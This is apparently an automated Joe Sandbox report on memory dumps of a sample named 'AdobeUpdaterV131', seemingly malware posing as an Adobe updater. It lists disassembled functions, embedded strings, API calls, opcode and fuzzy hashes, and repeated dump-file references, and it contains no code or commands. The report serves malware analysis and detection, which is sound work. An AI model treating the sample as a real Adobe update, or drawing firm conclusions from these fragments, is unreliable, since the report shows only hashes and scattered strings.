Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID: %s|%s$131$<,u$<,u$d+u$type must be boolean, but is
API String ID: 0-1497195349
Opcode ID: fe311c6826695b2886f9f90946d89c76435d7e9cd7c75d22e91575464509d556
Instruction ID: 80b09e6e464e6ebcb06e2b1acb824d72d16b122f6ebc4f0811d804b68f307f96
Opcode Fuzzy Hash: fe311c6826695b2886f9f90946d89c76435d7e9cd7c75d22e91575464509d556
Instruction Fuzzy Hash: 1523EF709002588FDB25DFA8C958BEDBBB2AF06304F1481DCD449AB392DB759E85CF91

Function 006F9AB0 Relevance: 9.2, Strings: 7, Instructions: 490COMMON

Download Yara Rule

Strings

automatic extension loading failed: %s, xrefs: 006F9FC3
no such vfs: %s, xrefs: 006F9CC1
MATCH, xrefs: 006F9E7B, 006F9E89, 006F9EA9, 006F9EAA, 006F9EC0
RTRIM, xrefs: 006F9D25
sqlite_rename_table, xrefs: 006F9E57
BINARY, xrefs: 006F9CE2, 006F9CF1, 006F9D0B, 006F9D4D
NOCASE, xrefs: 006F9D64

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
API String ID: 0-1885142750
Opcode ID: 20d205e228e431458196f029913f89913a1a8a0eaa44fcc7912ecdaa33d4a0f0
Instruction ID: 0adf7193312db425ff6fb7d713c7e26661126d8dbd238c1a0036494ee176c698
Opcode Fuzzy Hash: 20d205e228e431458196f029913f89913a1a8a0eaa44fcc7912ecdaa33d4a0f0
Instruction Fuzzy Hash: 710217B0B007089FE7209F64DC45BBB77E6AF41704F14442CE64A87392EBB9E945CBA5

Function 00633D50 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 671COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0063434B
__Mtx_unlock.LIBCPMT ref: 00634451
__Mtx_unlock.LIBCPMT ref: 0063451C

Strings

T@_, xrefs: 00633DF0

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID: T@_
API String ID: 1418687624-2673433630
Opcode ID: e456f7fd71334e6cc5942ba4f7e0f66dc97c187fc543f57a69e13ffc3955e34a
Instruction ID: a796a7b1af3be89b31e43893b85489d099b2c1b729962d3c387e1681db20b670
Opcode Fuzzy Hash: e456f7fd71334e6cc5942ba4f7e0f66dc97c187fc543f57a69e13ffc3955e34a
Instruction Fuzzy Hash: 1032F271A002088FDB08DF68DC95BEEB7B2EF45314F14825CE805AB392DB75AA45CBD5

Function 0068F980 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

/Kim, xrefs: 0068FBC2
type must be number, but is , xrefs: 0068FB41
/Kim, xrefs: 0068FBA9
type must be string, but is , xrefs: 0068F9E4

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
API String ID: 0-1144537432
Opcode ID: 214c91792d497d63cfaffddfa24f537f66601e214ca4f6ca2762e1c71290ff01
Instruction ID: b43cfb84799f850472b58900e3e11043dc83656b7537d9ad9d7847eae8a36938
Opcode Fuzzy Hash: 214c91792d497d63cfaffddfa24f537f66601e214ca4f6ca2762e1c71290ff01
Instruction Fuzzy Hash: D291E671F002189FCB08DF6CD8917D9B7AAEB89320F14827EE919A7391D7755D06C790

Function 0062A290 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

File, xrefs: 0062A4AC

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID: File
API String ID: 0-749574446
Opcode ID: 02ccb49720001856df14318fecb0da6c1e8d821596d2bc19a3b2509ec42b3965
Instruction ID: 6e278e659a7893894bc6f79e43607b0b29d080fbc90e9411ac470c055681d98b
Opcode Fuzzy Hash: 02ccb49720001856df14318fecb0da6c1e8d821596d2bc19a3b2509ec42b3965
Instruction Fuzzy Hash: B6C1F070D00258ABDF10DFA4DC45BEEBBB9EF05300F144169E505BB292E7B4A985CF56

Function 006FBF8B Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,006FB999,?,?,?,?,0063454B,?,0063E6FC), ref: 006FBFA4

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: d2404373ef60e23983a718feaab409c8b75424e92e7691fff0c90b5f1d80fbf8
Instruction ID: ffcb37b76da85ec3f4a788cf4754baa2b3356c02260f366dade71f96ba88cb31
Opcode Fuzzy Hash: d2404373ef60e23983a718feaab409c8b75424e92e7691fff0c90b5f1d80fbf8
Instruction Fuzzy Hash: D6D0223290323CA38A253BD0FC004FDBB1DCB06B143045011EE0933220CB90AC014FE9

Function 00622040 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

string too long, xrefs: 00622040

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 2141394445-2556327735
Opcode ID: 5c883d4a69b42387c97cb1de710876cae76377125b000f1af8230418bd540c3f
Instruction ID: f36ca24fe731c9e304da94bba4da7395a2eb5b559ed28c112535914a7ae6efc3
Opcode Fuzzy Hash: 5c883d4a69b42387c97cb1de710876cae76377125b000f1af8230418bd540c3f
Instruction Fuzzy Hash: 25812375904696EFDB01CFA8C465BEEBFB2EF1A300F144199D9806B782C3758646CBE0

Function 0062A6C0 Relevance: 1.1, Instructions: 1084COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2787a25465fd2c320d796ce91c86076c4aab692f03f0fee95ccf97b2dfda5a7a
Instruction ID: 13b76f0d96a1506a8fb056dd5cb033483c52ab83950c8d9f98717579ca316f84
Opcode Fuzzy Hash: 2787a25465fd2c320d796ce91c86076c4aab692f03f0fee95ccf97b2dfda5a7a
Instruction Fuzzy Hash: F8920331D006588BDF09CFA8D8947FEBB76EF42314F24829CD8556B282D7749A86CF91

Function 006A3ED0 Relevance: .7, Instructions: 744COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7775860cce46587a2d2b5316939500113ab393172fd34712505d2e9bfb515b53
Instruction ID: 457c8b1241154d9433e6086577e796fe47d87a15cedacd76bf373435b9e583fb
Opcode Fuzzy Hash: 7775860cce46587a2d2b5316939500113ab393172fd34712505d2e9bfb515b53
Instruction Fuzzy Hash: 72624AB0E002159BDB14DF59C5846ADBBF2EF8A308F2881ADD815AB352C776DD46CF90

Function 00708BCF Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec62d9f9e60a498177c9266573c36538cf5bf24a49698e4c14e9b5ad024ffef5
Instruction ID: 831f63d8d482f7f05ef10a04d57deca3f484070bfff3831a31dce2375ef9b2aa
Opcode Fuzzy Hash: ec62d9f9e60a498177c9266573c36538cf5bf24a49698e4c14e9b5ad024ffef5
Instruction Fuzzy Hash: 71C1DE30A00A46CEDBA4CF68C98467ABBF1BB15310F144B59D5D29B6D2CF39AD45CB22

Function 0071C4A1 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b3c39ce83e0f13b29bd4e7abed4ecb9d5f81751daf7d657111e10801f66d66
Instruction ID: 1c5bf1e4dc0fb16ab5488fd3ac59a61b9d7d689367b82a95566d6ebbc6254968
Opcode Fuzzy Hash: 23b3c39ce83e0f13b29bd4e7abed4ecb9d5f81751daf7d657111e10801f66d66
Instruction Fuzzy Hash: 17B106755407058BDB399BACCC82AF7B3A9EF54308F54452DE983865C0EBB8A9C5CB10

Function 006222C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d85e2be7d497af9293ae54c4cb74408932a467f6efa198027e8c743e0580e0e
Instruction ID: 13615db9d0950f3dd5a5001f91f517a02ad2fd28e611325dc6d324e9b4f5d775
Opcode Fuzzy Hash: 5d85e2be7d497af9293ae54c4cb74408932a467f6efa198027e8c743e0580e0e
Instruction Fuzzy Hash: 007118B1D006669FDB11CF59E8A07FEBBB6EB1A300F444268D85597793C3389906CBA0

Function 006A0BF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID:
